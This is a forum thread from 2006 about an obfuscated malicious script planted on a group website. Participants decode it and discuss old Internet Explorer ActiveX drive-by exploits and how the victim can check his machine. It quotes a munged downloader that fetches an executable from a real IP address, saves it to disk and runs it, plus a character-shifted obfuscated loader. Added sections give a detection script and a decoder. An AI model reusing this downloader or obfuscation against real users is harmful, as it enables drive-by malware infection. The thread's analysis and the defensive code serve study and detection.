Velocity Reviews - Computer Hardware Reviews

Malicious javascript obfuscation

 
 
Ant
10-28-2006
"Wong Yung" wrote:

> *Sigh* I couldn't get a nice simple evil guy could I?


Many of the malware writers today are funded by organized crime, and
the software is getting more sophisticated. It's not so much hackers
having fun anymore.

> BTW what is this other more obfuscated exploit that you found?


There are a couple of levels of encoded script which I won't go
through here, but eventually it boils down to this (some munging
again; [ ] replace < >, and ht_p replaces http) ...

[script language='jscript']
a=new ActiveXObject('Shell.Application');
var x = new ActiveXObject('Mic'+'ros'+'oft.X'+'MLHTTP');
x.Open('GET','ht_p://66.36.241.243/d.exe',0);
x.Send();
var s=new ActiveXObject('ADODB.Stream');
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile('../tm.exe',2);
a.ShellExecute('../tm.exe');
[/script]

So here is another method of downloading "d.exe" from the same IP
address as before, then using the ADODB.Stream cross-domain exploit
to save the file as "tm.exe" and run it in the context of the local
machine. MS patched this particular vulnerability some time ago.


 
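A small static triage check for the kind of script quoted in the post above, added here as an example (not code from the thread or from anyone in it). It folds concatenated string literals such as 'Mic'+'ros'+'oft.X'+'MLHTTP' back together, then flags the ProgIDs and calls that make up the download, save-to-disk and execute chain. The sample script is constructed for this example with the post's munging undone and a documentation address instead of the real one.

```javascript
// Added example, not from the thread: static triage of a downloader script
// that hides its ActiveX ProgIDs behind string concatenation.

// Constructed sample based on the quoted script; the address is TEST-NET-2
// documentation space, not the one in the post.
const SAMPLE_SCRIPT = [
  "a=new ActiveXObject('Shell.Application');",
  "var x = new ActiveXObject('Mic'+'ros'+'oft.X'+'MLHTTP');",
  "x.Open('GET','http://198.51.100.7/d.exe',0);",
  "x.Send();",
  "var s=new ActiveXObject('ADODB.Stream');",
  "s.SaveToFile('../tm.exe',2);",
  "a.ShellExecute('../tm.exe');",
].join("\n");

// Join adjacent string literals ('a'+'b' -> 'ab'), repeating until stable so
// chains of any length collapse to one literal.
function foldConcatenations(src) {
  const re = /(['"])((?:(?!\1).)*)\1\s*\+\s*(['"])((?:(?!\3).)*)\3/g;
  let prev;
  do {
    prev = src;
    src = src.replace(re, (m, q1, a, q2, b) => `'${a}${b}'`);
  } while (src !== prev);
  return src;
}

// Indicators of the ActiveX fetch / write / run chain, matched on the folded text.
const INDICATORS = [
  ["activex-xmlhttp", /ActiveXObject\(\s*['"]Microsoft\.XMLHTTP['"]/i],
  ["activex-adodb-stream", /ActiveXObject\(\s*['"]ADODB\.Stream['"]/i],
  ["activex-shell", /ActiveXObject\(\s*['"]Shell\.Application['"]/i],
  ["save-to-file", /\.SaveToFile\s*\(/i],
  ["shell-execute", /\.ShellExecute\s*\(/i],
  ["remote-exe-url", /https?:\/\/[^\s"'<>]+\.exe\b/i],
];

// Returns the indicator names that matched and a verdict: fetching a file,
// writing it to disk and executing it is the full chain the post describes.
function triageScript(src) {
  const folded = foldConcatenations(src);
  const hits = INDICATORS.filter(([, re]) => re.test(folded)).map(([name]) => name);
  const chain = ["activex-xmlhttp", "save-to-file", "shell-execute"].every(n => hits.includes(n));
  return { hits, verdict: chain ? "download-and-execute chain" : "no full chain" };
}

console.log(triageScript(SAMPLE_SCRIPT));
```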
Sebastian Gottschalk
10-28-2006
Ant wrote:

>> *Sigh* I couldn't get a nice simple evil guy could I?

>
> Many of the malware writers today are funded by organized crime, and
> the software is getting more sophisticated. It's not so much hackers
> having fun anymore.


Actually decoding obfuscated stuff can be quite fun. F.e. I once got a
script that used its very own URL (retrieved by document.location) as a
part of the self-decryption - anyone who didn't care for the URL anymore
after 4 redirects (each with a new obfuscation) and didn't store it, had a
little problem.
At the end, the last obfuscation layer outputted a script in a broken way,
so it didn't work correctly. But one could still figure out what it did -
and among many classical IE "exploits" one could actually find two new
ones. Reported them to Microsoft quickly, and a patch was never issued.
Business as usual.

> So here is another method of downloading "d.exe" from the same IP
> address as before, then using the ADODB.Stream cross-domain exploit
> to save the file as "tm.exe" and run it in the context of the local
> machine. MS patched this particular vulnerability some time ago.


Not quite true. One can sometimes trigger to download new or old versions
of existing ActiveX controls (ignoring IE's settings), and then make such
exploits work again. Even aside from that, just invoking an ActiveX control
without any possibility to access its scripting, can have devastating side
effects - f.e. invoking TlntSrv.TlntClientEnum (not safe for scripting)
made Windows 2000 Server SP3 start the Telnet Server Service if installed.
 
Wong Yung
10-28-2006

Sebastian Gottschalk wrote:
> Ant wrote:
>
> >> *Sigh* I couldn't get a nice simple evil guy could I?

> >
> > Many of the malware writers today are funded by organized crime, and
> > the software is getting more sophisticated. It's not so much hackers
> > having fun anymore.

>
> Actually decoding obfuscated stuff can be quite fun. F.e. I once got a
> script that used its very own URL (retrieved by document.location) as a
> part of the self-decryption - anyone who didn't care for the URL anymore
> after 4 redirects (each with a new obfuscation) and didn't store it, had a
> little problem.
> At the end, the last obfuscation layer outputted a script in a broken way,
> so it didn't work correctly. But one could still figure out what it did -
> and among many classical IE "exploits" one could actually find two new
> ones. Reported them to Microsoft quickly, and a patch was never issued.
> Business as usual.
>
> > So here is another method of downloading "d.exe" from the same IP
> > address as before, then using the ADODB.Stream cross-domain exploit
> > to save the file as "tm.exe" and run it in the context of the local
> > machine. MS patched this particular vulnerability some time ago.

>
> Not quite true. One can sometimes trigger to download new or old versions
> of existing ActiveX controls (ignoring IE's settings), and then make such
> exploits work again. Even aside from that, just invoking an ActiveX control
> without any possibility to access its scripting, can have devastating side
> effects - f.e. invoking TlntSrv.TlntClientEnum (not safe for scripting)
> made Windows 2000 Server SP3 start the Telnet Server Service if installed.


Now I'm getting scared...So how can I be sure there isn't any nasty
stuff on my computer as a result of this? I've run a full antivirus
check, a full antispyware check and a full anti-trojan check using
Trojan Hunter and these programs at least say I'm clean. I am fully
patched up (I always install the updates as soon as they become
available). And I've run netstat and it doesn't show any strange
internet connections and my firewall doesn't show any strange
connections though of course it could be piggy-backing on another
program. *Sigh* Who'd have thought that you'd get infected from your own
webpage.

 
Sebastian Gottschalk
10-28-2006
Wong Yung wrote:

>> [ActiveX is dangerous to no end]

> Now I'm getting scared...So how can I be sure there isn't any nasty
> stuff on my computer as a result of this?


Comparing all relevant system binaries against a baseline set of checksums?

Anyway, you said you're using Safari or Links (eh... try Links2). Those
don't know anything about ActiveX - only IE is vulnerable. Maybe also
Mozilla with the ActiveX plugin intentionally installed, but even then
you'd have to explicitly whitelist vulnerable controls in the first place.

> I've run a full antivirus check, a full antispyware check and a full
> anti-trojan check using Trojan Hunter and these programs at least say I'm clean.


Which means exactly nothing.

> I am fully patched up (I always install the updates as soon as they become
> available).


Well, at least for IE, OE, WMP and the Messenger stuff (and Wordpad if
you're not running Windows Server 2003), this means about nothing.

> And I've run netstat and it doesn't show any strange
> internet connections and my firewall doesn't show any strange
> connections though of course it could be piggy-backing on another
> program.


As already mentioned: If you didn't use IE, there's no reason why you would
have any problem at all.

> *Sigh* Who'd have thought that you'd get infected from your own webpage.


At least for IE, any user should think so: It's stated in the manual! [1]



[1] Windows XP/Server 2003 Security Guide, Group Policies, IE, "Object
Caching Protection". It describes how you can activate a totally incomplete
solution to an inherent design problem that makes cross-site-scripting
trivially possible, in conjunction with the default full trust in the
Windows Update website as the XSS target giving every website full access
to all security-critical functions of IE.
 
Wong Yung
10-28-2006

Sebastian Gottschalk wrote:
> Wong Yung wrote:
>
> >> [ActiveX is dangerous to no end]

> > Now I'm getting scared...So how can I be sure there isn't any nasty
> > stuff on my computer as a result of this?

>
> Comparing all relevant system binaries against a baseline set of checksums?
>
> Anyway, you said you're using Safari or Links (eh... try Links2). Those
> don't know anything about ActiveX - only IE is vulnerable. Maybe also
> Mozilla with the ActiveX plugin intentionally installed, but even then
> you'd have to explicitly whitelist vulnerable controls in the first place.
>
> > I've run a full antivirus check, a full antispyware check and a full
> > anti-trojan check using Trojan Hunter and these programs at least say I'm clean.

>
> Which means exactly nothing.
>
> > I am fully patched up (I always install the updates as soon as they become
> > available).

>
> Well, at least for IE, OE, WMP and the Messenger stuff (and Wordpad if
> you're not running Windows Server 2003), this means about nothing.
>
> > And I've run netstat and it doesn't show any strange
> > internet connections and my firewall doesn't show any strange
> > connections though of course it could be piggy-backing on another
> > program.

>
> As already mentioned: If you didn't use IE, there's no reason why you would
> have any problem at all.
>
> > *Sigh* Who'd have thought that you'd get infected from your own webpage.

>
> At least for IE, any user should think so: It's stated in the manual! [1]
>
>
>
> [1] Windows XP/Server 2003 Security Guide, Group Policies, IE, "Object
> Caching Protection". It describes how you can activate a totally incomplete
> solution to an inherent design problem that makes cross-site-scripting
> trivially possible, in conjunction with the default full trust in the
> Windows Update website as the XSS target giving every website full access
> to all security-critical functions of IE.


I use Linux at work but at home I have Windows XP. Usually I use
Firefox. However, as I was changing some things on my site I thought
that I should check that it works in IE as well (you know IE and
css...). Ergo I looked at my homepage in IE. Normally I avoid IE like
the plague but I thought, hey it's my own homepage, should be safe.
Right? Unfortunately I had IE on the default Moderate Security setting
because I never use IE.

*Sigh*

 
Wong Yung
10-28-2006

Wong Yung wrote:

>
> I use Linux at work but at home I have Windows XP. Usually I use
> Firefox. However, as I was changing some things on my site I thought
> that I should check that it works in IE as well (you know IE and
> css...). Ergo I looked at my homepage in IE. Normally I avoid IE like
> the plague but I thought, hey it's my own homepage, should be safe.
> Right? Unfortunately I had IE on the default Moderate Security setting
> because I never use IE.
>
> *Sigh*


Oh yeah, I forgot to mention. I may use Linux at work but practically
everyone else uses Windows XP with IE. And of course they visit the
hacked webpage fairly regularly which is actually not really my
personal webpage but more like the webpage for the entire
group (when I talk about my homepage I'm talking about my personal page
in this larger group site) so they go there to say get the latest news
and whatnot. I do too but I usually do so at work in Linux or if I'm
at home using Windows using Firefox (the only time I used IE was for 2
minutes once to check whether the css was screwed up or not. Sadly
enough that may be all that was required to get myself hacked...).
Most of the other people at work go there in Windows using IE. So as
you can see, there is quite a lot of potential for trouble here...

 
Ant
10-29-2006
"Wong Yung" wrote:

> Sebastian Gottschalk wrote:
>> Not quite true. One can sometimes trigger to download new or old versions
>> of existing ActiveX controls (ignoring IE's settings), and then make such
>> exploits work again. Even aside from that, just invoking an ActiveX control
>> without any possibility to access its scripting, can have devastating side
>> effects - f.e. invoking TlntSrv.TlntClientEnum (not safe for scripting)
>> made Windows 2000 Server SP3 start the Telnet Server Service if installed.

>
> Now I'm getting scared...So how can I be sure there isn't any nasty
> stuff on my computer as a result of this?


You could start by looking for those files mentioned in the exploits
(u.exe, d.exe and tm.exe), although sometimes the malware will delete
the initial files once it's installed.

> I've run a full antivirus
> check, a full antispyware check and a full anti-trojan check using
> Trojan Hunter and these programs at least say I'm clean. I am fully
> patched up (I always install the updates as soon as they become
> available). And I've run netstat and it doesn't show any strange
> internet connections and my firewall doesn't show any strange
> connections though of course it could be piggy-backing on another
> program.


If there's no unusual activity you are probably ok, but unless you're
very familiar with your system the only sure way is to reformat the HD
and reinstall the OS.

There's now an 'ADODB.connection' vulnerability which has just been
discovered. See http://isc.sans.org/diary.php?storyid=1807

Next time you use IE on the Internet, be sure to disable ActiveX
completely.


 
Sebastian Gottschalk
10-29-2006
Ant wrote:

> Next time you use IE on the Internet, be sure to disable ActiveX
> completely.


Doesn't matter. There are various unpatched buffer overflows which can be
triggered without any ActiveX or Scripting. In any case, you're ****ed off.
 
Ant
10-29-2006
"Sebastian Gottschalk" wrote:

> Ant wrote:
>> Next time you use IE on the Internet, be sure to disable ActiveX
>> completely.

>
> Doesn't matter. There are various unpatched buffer overflows which can be
> triggered without any ActiveX or Scripting.


Well, that doesn't surprise me.

> In any case, you're ****ed off.


What do you mean by that? I'm quite content, thanks.


 
erewhon
10-29-2006

>> s='@mjveqi$wvgA&lxxt>33i;he;2mr3syx2tltCwcmhA5&${mhxlA4$fsvhivA4$limklxA4$wx}piA&hmwtpe}>rsri&B';o=' ';for(i=0;i<92;i++){o+=String.fromCharCode(s.charCodeAt(i)-4);}document.write(o);
>>
>> Is there any tool I can use to work out what the URL is from this?

>
> It's javascript so a web browser is all you need.
>
> It's a rot 4 encoding if you will. It's just taking each of the
> characters of that string s and subtracting 4 from it
> i.e. s.charCodeAt(i)-4


Can you explain the process/tools you use? I'm no code head but am
impressed by this type of work.


 
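The "rot 4" layer discussed above can be undone without loading the page in a browser. The decoder below is an added example (not code from the thread); it generalises the single subtraction of 4 to a search over candidate shifts, scoring each by how much printable text and markup comes out, and then pulls the URLs an analyst would want to block. The obfuscated input is constructed here from a made-up iframe with a reserved .invalid host, not the string from the post.

```javascript
// Added example, not from the thread: decode a "code point minus N" layer
// offline and recover the shift when it is not known in advance.

// Shift every UTF-16 code unit by `shift` (positive to encode, negative to decode).
function shiftString(text, shift) {
  return Array.from(text, ch => String.fromCharCode(ch.charCodeAt(0) + shift)).join("");
}

// Constructed sample: a hidden-iframe fragment obfuscated with shift 4,
// the same scheme as the quoted script (host is reserved, not a real site).
const SAMPLE_PLAINTEXT = '<iframe src="http://malware.example.invalid/out.php?id=1" width=0 height=0>';
const SAMPLE_OBFUSCATED = shiftString(SAMPLE_PLAINTEXT, 4);

// Fraction of characters that are printable ASCII (or whitespace);
// the right shift yields 1.0, wrong shifts produce control or non-ASCII bytes.
function printableRatio(text) {
  let ok = 0;
  for (const ch of text) {
    const c = ch.charCodeAt(0);
    if ((c >= 0x20 && c <= 0x7e) || c === 0x0a || c === 0x0d || c === 0x09) ok++;
  }
  return text.length ? ok / text.length : 0;
}

// Try each shift in 1..maxShift and keep the decoding that looks most like
// HTML or script; a markup tag at the start is worth an extra point.
function bruteForceShift(obfuscated, maxShift = 32) {
  let best = { shift: 0, text: obfuscated, score: -1 };
  for (let shift = 1; shift <= maxShift; shift++) {
    const text = shiftString(obfuscated, -shift);
    const score = printableRatio(text) + (/<(script|iframe|object|embed)\b/i.test(text) ? 1 : 0);
    if (score > best.score) best = { shift, text, score };
  }
  return best;
}

// Extract the URLs from the decoded layer for blocking or hunting.
function extractUrls(text) {
  return text.match(/https?:\/\/[^\s"'<>]+/gi) || [];
}

const result = bruteForceShift(SAMPLE_OBFUSCATED);
console.log("shift:", result.shift);
console.log("decoded:", result.text);
console.log("urls:", extractUrls(result.text));
```

Each decoded layer is fed back in as new input until the output is plain script; the URL that layer would load is the indicator to block rather than something to fetch.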